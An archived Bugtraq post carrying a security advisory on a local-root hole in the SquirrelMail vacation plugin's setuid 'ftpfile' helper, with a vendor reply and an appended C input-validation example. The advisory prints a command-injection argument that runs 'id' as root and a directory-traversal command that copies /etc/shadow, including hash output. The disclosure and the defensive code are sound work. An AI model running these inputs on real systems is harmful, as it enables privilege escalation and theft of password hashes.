Bugtraq mailing list archives
Re: Squirrelmail vacation v0.15 local root exploit
From: p dont think <pdontthink () angrynerds com>
Date: Thu, 03 Feb 2005 20:13:31 -0800
All,

A new release of this plugin that addresses this exploit is now available at:

http://www.squirrelmail.org/plugin_view.php?id=51

Due to the severity of the exploits in prior versions, upgrade is highly recommended. Also, please keep in mind that while the SquirrelMail team takes security very seriously, it cannot take full responsibility for the plethora of third-party plugins, of which this is one.

LSS team: pleeeease let us know *before* you are going to make your announcement next time.

- Paul Lesneiwski

LSS Security Advisory #LSS-2005-01-03
http://security.lss.hr

---

Title              : Squirrelmail vacation v0.15 local root exploit
Advisory ID        : LSS-2005-01-03
Date               : 10.01.2005.
Advisory URL       : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact             : Privilege escalation and arbitrary file read
Risk level         : High
Vulnerability type : Local
Vendors contacted  : No response from vendor

---

===[ Overview

Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of
the receiver's absence. Vacation plugin specifically uses the Vacation
program.

Plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz

===[ Vulnerability

Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
The program is used to access local files in user's home directory. There
is a privilege escalation and arbitrary file read vulnerability in ftpfile.
Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as
root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$

It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other directory
without checking file name for directory traversal attack.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow
[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$

===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.

===[ Fix

Not available yet.

===[ PoC Exploit

http://security.lss.hr/exploits/

===[ Credits

Credits for this vulnerability go to Leon Juranic.

===[ LSS Security Contact

LSS Security Team, <eXposed by LSS>

WWW    : http://security.lss.hr
E-mail : security () LSS hr
Tel    : +385 1 6129 775
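
Added example, not part of the original post, the advisory or the plugin's own code: the two checks whose absence the advisory describes (shell metacharacters and directory traversal in file-name arguments), written in C for a hypothetical setuid copy helper. The function names, the `outdir` parameter and the sample inputs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Accept only relative names made of [A-Za-z0-9._-] components joined by '/'.
 * Rejects shell metacharacters, absolute paths, "." and ".." components,
 * empty components and option-like components starting with '-'. */
int safe_relative_name(const char *name)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    if (name == NULL || *name == '\0' || strlen(name) > 255)
        return 0;
    while (*name != '\0') {
        size_t len = strspn(name, ok);      /* length of this component */
        if (len == 0 || name[0] == '-')
            return 0;
        if (name[0] == '.' && (len == 1 || (len == 2 && name[1] == '.')))
            return 0;
        name += len;
        if (*name == '/' && name[1] != '\0')
            name++;                         /* step over one separator */
        else if (*name != '\0')
            return 0;                       /* metacharacter or trailing '/' */
    }
    return 1;
}

/* Build argv for a direct execv("/bin/cp", ...): no shell ever parses the
 * names. Returns 0 on success, -1 if a name is rejected or a buffer is short. */
int build_copy_argv(const char *home, const char *outdir,
                    const char *src, const char *dst,
                    char *from, char *to, size_t buflen, const char *argv[5])
{
    int n, m;
    if (!safe_relative_name(src) || !safe_relative_name(dst))
        return -1;
    n = snprintf(from, buflen, "%s/%s", home, src);   /* anchored under home */
    m = snprintf(to, buflen, "%s/%s", outdir, dst);   /* anchored under outdir */
    if (n < 0 || m < 0 || (size_t)n >= buflen || (size_t)m >= buflen)
        return -1;
    argv[0] = "/bin/cp"; argv[1] = "--";    /* "--" ends option parsing */
    argv[2] = from; argv[3] = to; argv[4] = NULL;
    return 0;
}

int main(void)
{
    printf("%d\n", safe_relative_name("LSS-Security;id")); /* constructed input */
    return 0;
}
```

A lexical check like this does not stop a symlink inside the home directory from pointing elsewhere, so such a helper should also drop to the requesting user's uid before opening or copying any file.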